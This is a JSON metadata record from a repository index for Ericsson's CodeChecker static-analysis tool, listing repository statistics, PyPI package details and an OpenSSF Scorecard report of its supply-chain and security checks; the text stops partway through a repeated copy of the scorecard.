{"id":62270,"name":"codechecker","description":"CodeChecker is an analyzer tooling, defect database and viewer extension for static and dynamic analyzer tools.","url":"https://github.com/ericsson/codechecker","last_synced_at":"2025-09-08T12:41:23.656Z","repository":{"id":37431651,"uuid":"37459110","full_name":"Ericsson/codechecker","owner":"Ericsson","description":"CodeChecker is an analyzer tooling, defect database and viewer extension for static and dynamic analyzer tools.","archived":false,"fork":false,"pushed_at":"2025-08-19T16:09:45.000Z","size":44800,"stargazers_count":2443,"open_issues_count":456,"forks_count":424,"subscribers_count":52,"default_branch":"master","last_synced_at":"2025-08-19T17:45:59.071Z","etag":null,"topics":["analysis","c","clang","clang-tidy","codechecker","cpp","database","defects","docker","linux","llvm","macosx","objective-c","results-viewer","static-analysis","static-analyzer","static-analyzers","vue"],"latest_commit_sha":null,"homepage":"https://codechecker.readthedocs.io","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Ericsson.png","metadata":{"files":{"readme":"docs/README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE.TXT","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":"docs/supported_code_analyzers.md","governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2015-06-15T10:38:51.000Z","updated_at":"2025-08-19T16:09:49.000Z","dependencies_parsed_at":"2023-09-29T11:42:30.441Z","dependency_job_id":"50b5428a-2bdc-4def-b0a6-a46baec9079d","html_url":"https://github.com/Ericsson/codechecker","commit_stats":{"total_commits":3749,"total_committers":127,"mean_commits":"29.519685039370078","dds":0.6054947986129635,"last_synced_commit":"4234fb7b91d07681ee032862fbb096197d5f104a"},"previous_names":[],"tags_count":90,"template":false,"template_full_name":null,"purl":"pkg:github/Ericsson/codechecker","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ericsson","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/sbom","scorecard":{"id":46490,"data":{"date":"2025-08-11","repo":{"name":"github.com/Ericsson/codechecker","commit":"49a939ab451d1b2a06553f17c4635a306527c33a"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.9,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 4 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/codechecker_master_analysis.yml:1","Warn: no topLevel permission defined: .github/workflows/codechecker_pr_analysis.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/config_coverage.yml:24","Info: topLevel permissions set to 'read-all': .github/workflows/docker.yml:8","Info: topLevel permissions set to 'read-all': .github/workflows/pypi.yml:9","Info: topLevel permissions set to 'read-all': .github/workflows/snap.yml:8","Info: topLevel permissions set to 'read-all': .github/workflows/test.yml:6","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.TXT:0","Info: FSF or OSI recognized license: Apache License 2.0: LICENSE.TXT:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/docker.yml:11"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_master_analysis.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_master_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_master_analysis.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_master_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_pr_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_pr_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/config_coverage.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/config_coverage.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/config_coverage.yml:32: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/config_coverage.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/config_coverage.yml:51: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/config_coverage.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/docker.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/docker.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/docker.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/docker.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:64: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:68: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/snap.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/snap.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/snap.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/snap.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/snap.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/snap.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:91: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:92: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:117: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:154: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:199: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: containerImage not pinned by hash: docker/Dockerfile.test.sqlite.clang11.bionic:1: pin your Docker image by updating ubuntu:18.04 to ubuntu:18.04@sha256:152dc042452c496007f07ca9127571cb9c29697f42acbfad72324b2bb2e43c98","Warn: containerImage not pinned by hash: docker/Dockerfile.test.sqlite.clang11.xenial:1: pin your Docker image by updating ubuntu:16.04 to ubuntu:16.04@sha256:1f1a2d56de1d604801a9671f301190704c25d604a416f59e03c04f5c6ffee0d6","Warn: containerImage not pinned by hash: docker/thrift/Dockerfile.thrift.noble:1: pin your Docker image by updating ubuntu:24.04 to ubuntu:24.04@sha256:a08e551cb33850e4740772b38217fc1796a66da2506d312abe51acda354ff061","Warn: containerImage not pinned by hash: web/docker/Dockerfile:5","Warn: containerImage not pinned by hash: web/docker/Dockerfile:43: pin your Docker image by updating python:3.10.16-slim-bullseye to python:3.10.16-slim-bullseye@sha256:c758f6d42a79466e943350a2c5273a09767bddc16a81d381ed21675a382205ee","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.bionic:3-29","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.bionic:3-29","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.xenial:3-33","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.xenial:3-33","Warn: downloadThenRun not pinned by hash: web/docker/Dockerfile:16-23","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_master_analysis.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_master_analysis.yml:24","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:22","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/pypi.yml:103","Warn: pipCommand not pinned by hash: .github/workflows/pypi.yml:104","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:51","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:58","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:64","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:70","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:77","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:83","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:125","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:177","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:217","Info:   0 out of  28 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   6 third-party GitHubAction dependencies pinned","Info:   0 out of   5 containerImage dependencies pinned","Info:   0 out of  24 pipCommand dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"24 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: PYSEC-2025-49 / GHSA-5rjg-fvgr-3xxf","Warn: Project is vulnerable to: GHSA-9hjg-9r4m-mvj7","Warn: Project is vulnerable to: GHSA-3ww4-gg4f-jr7f","Warn: Project is vulnerable to: PYSEC-2024-225 / GHSA-6vqw-3v5j-54x4","Warn: Project is vulnerable to: GHSA-9v9h-cgj8-h64p","Warn: Project is vulnerable to: GHSA-h4gh-qq45-vh27","Warn: Project is vulnerable to: PYSEC-2023-254 / GHSA-jfhm-5ghh-2f97","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-gxpj-cx7g-858c","Warn: Project is vulnerable to: GHSA-2j2x-2gpw-g8fm","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-2p57-rm9w-gvfp","Warn: Project is vulnerable to: GHSA-f8q6-p94x-37v3","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-7fh5-64p2-3v2j","Warn: Project is vulnerable to: GHSA-p8p7-x288-28g6","Warn: Project is vulnerable to: GHSA-f5x3-32g6-xq36","Warn: Project is vulnerable to: GHSA-72xf-g2v4-qvf3","Warn: Project is vulnerable to: GHSA-cchq-frgv-rjh5","Warn: Project is vulnerable to: GHSA-g644-9gfx-q4q4","Warn: Project is vulnerable to: GHSA-5j4c-8p2g-v4jx","Warn: Project is vulnerable to: GHSA-g3ch-rx76-35fx","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-14T22:53:38.249Z","repository_id":37431651,"created_at":"2025-08-14T22:53:38.249Z","updated_at":"2025-08-14T22:53:38.249Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":274187375,"owners_count":25237784,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-08T02:00:09.813Z","response_time":121,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"owner":{"login":"Ericsson","name":"Ericsson","uuid":"4161311","kind":"organization","description":"Home for Ericsson's Open Source software","email":"opensource@ericsson.com","website":"http://www.ericsson.com","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/4161311?v=4","repositories_count":119,"last_synced_at":"2024-04-15T22:07:40.334Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/Ericsson","funding_links":[],"total_stars":4306,"followers":165,"following":0,"created_at":"2022-11-05T10:49:44.232Z","updated_at":"2024-04-15T22:07:56.651Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ericsson","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ericsson/repositories"},"packages":[{"id":2674732,"name":"codechecker","ecosystem":"pypi","description":"CodeChecker is an analyzer tooling, defect database and viewer extension","homepage":"https://github.com/Ericsson/CodeChecker","licenses":"Apache-2.0 WITH LLVM-exception","normalized_licenses":["Apache-2.0"],"repository_url":"https://github.com/Ericsson/CodeChecker","keywords_array":["codechecker","plist","sarif"],"namespace":null,"versions_count":28,"first_release_published_at":"2021-05-05T12:30:15.000Z","latest_release_published_at":"2025-07-14T20:18:01.000Z","latest_release_number":"6.26.1","last_synced_at":"2025-08-19T18:10:28.774Z","created_at":"2022-04-10T10:23:46.071Z","updated_at":"2025-08-19T18:14:34.537Z","registry_url":"https://pypi.org/project/codechecker/","install_command":"pip install codechecker --index-url https://pypi.org/simple","documentation_url":"http://codechecker.readthedocs.io","metadata":{"funding":null,"documentation":"http://codechecker.readthedocs.io","classifiers":["Development Status :: 5 - Production/Stable","Environment :: Console","Environment :: Web Environment","Intended Audience :: Developers","License :: OSI Approved :: Apache Software License","Operating System :: MacOS","Operating System :: POSIX","Operating System :: POSIX :: Linux","Programming Language :: Python :: 3 :: Only","Topic :: Software Development :: Bug Tracking","Topic :: Software Development :: Quality Assurance"],"normalized_name":"codechecker","project_status":null},"repo_metadata":{"id":37431651,"uuid":"37459110","full_name":"Ericsson/codechecker","owner":"Ericsson","description":"CodeChecker is an analyzer tooling, defect database and viewer extension for static and dynamic analyzer tools.","archived":false,"fork":false,"pushed_at":"2025-08-19T16:09:45.000Z","size":44800,"stargazers_count":2443,"open_issues_count":456,"forks_count":424,"subscribers_count":52,"default_branch":"master","last_synced_at":"2025-08-19T17:45:59.071Z","etag":null,"topics":["analysis","c","clang","clang-tidy","codechecker","cpp","database","defects","docker","linux","llvm","macosx","objective-c","results-viewer","static-analysis","static-analyzer","static-analyzers","vue"],"latest_commit_sha":null,"homepage":"https://codechecker.readthedocs.io","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Ericsson.png","metadata":{"files":{"readme":"docs/README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE.TXT","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":"docs/supported_code_analyzers.md","governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2015-06-15T10:38:51.000Z","updated_at":"2025-08-19T16:09:49.000Z","dependencies_parsed_at":"2023-09-29T11:42:30.441Z","dependency_job_id":"50b5428a-2bdc-4def-b0a6-a46baec9079d","html_url":"https://github.com/Ericsson/codechecker","commit_stats":{"total_commits":3749,"total_committers":127,"mean_commits":"29.519685039370078","dds":0.6054947986129635,"last_synced_commit":"4234fb7b91d07681ee032862fbb096197d5f104a"},"previous_names":[],"tags_count":90,"template":false,"template_full_name":null,"purl":"pkg:github/Ericsson/codechecker","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ericsson","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/sbom","scorecard":{"id":46490,"data":{"date":"2025-08-11","repo":{"name":"github.com/Ericsson/codechecker","commit":"49a939ab451d1b2a06553f17c4635a306527c33a"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.9,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 4 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/codechecker_master_analysis.yml:1","Warn: no topLevel permission defined: .github/workflows/codechecker_pr_analysis.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/config_coverage.yml:24","Info: topLevel permissions set to 'read-all': .github/workflows/docker.yml:8","Info: topLevel permissions set to 'read-all': .github/workflows/pypi.yml:9","Info: topLevel permissions set to 'read-all': .github/workflows/snap.yml:8","Info: topLevel permissions set to 'read-all': .github/workflows/test.yml:6","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.TXT:0","Info: FSF or OSI recognized license: Apache License 2.0: LICENSE.TXT:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/docker.yml:11"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_master_analysis.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_master_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_master_analysis.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_master_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_pr_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:17: update your workflow using 